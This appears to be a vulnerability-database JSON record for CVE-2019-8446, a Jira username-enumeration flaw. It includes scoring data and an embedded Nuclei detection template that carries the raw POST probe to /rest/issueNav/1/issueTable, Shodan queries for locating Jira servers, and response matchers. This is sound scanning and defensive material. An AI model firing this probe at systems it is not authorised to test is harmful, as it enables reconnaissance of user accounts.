{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-8446/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-8446/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-8446/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-8446/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-8446/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-8446"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-8446"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.1755,
      "kev": false,
      "percentile": 0.97004
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2019/CVE-2019-8446.yaml",
      "nuclei_template_severity": "medium",
      "nuclei_template_yaml": "id: CVE-2019-8446\n\ninfo:\n  name: Jira Improper Authorization\n  author: dhiyaneshDk\n  severity: medium\n  description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.\n  impact: |\n    This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Jira application.\n  remediation: |\n    Apply the latest security patches and updates provided by Atlassian to fix the vulnerability.\n  reference:\n    - https://jira.atlassian.com/browse/JRASERVER-69777\n    - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839\n    - https://github.com/ARPSyndicate/kenzer-templates\n    - https://github.com/CyberTrashPanda/CVE-2019-8446\n    - https://github.com/Elsfa7-110/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2019-8446\n    cwe-id: CWE-863\n    epss-score: 0.1755\n    epss-percentile: 0.97004\n    cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: atlassian\n    product: jira_server\n    shodan-query:\n      - http.component:\"Atlassian Jira\"\n      - http.component:\"atlassian jira\"\n  tags: cve,cve2019,jira,atlassian,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /rest/issueNav/1/issueTable HTTP/1.1\n        Host: {{Hostname}}\n        Connection: Close\n        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\n        X-Atlassian-Token: no-check\n        Accept-Encoding: gzip, deflate\n        Accept-Language: en-US,en;q=0.9\n\n        {'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"the user does not exist\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100cbc67e7f54c923568333b9235ccd8438716a01ebf070de35ba7ca2ab8b475655022100eb21fe7246f9c9636c8826871d3efc6253f1649849a5e718ddc57901cbcc9530:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2019-8446"
}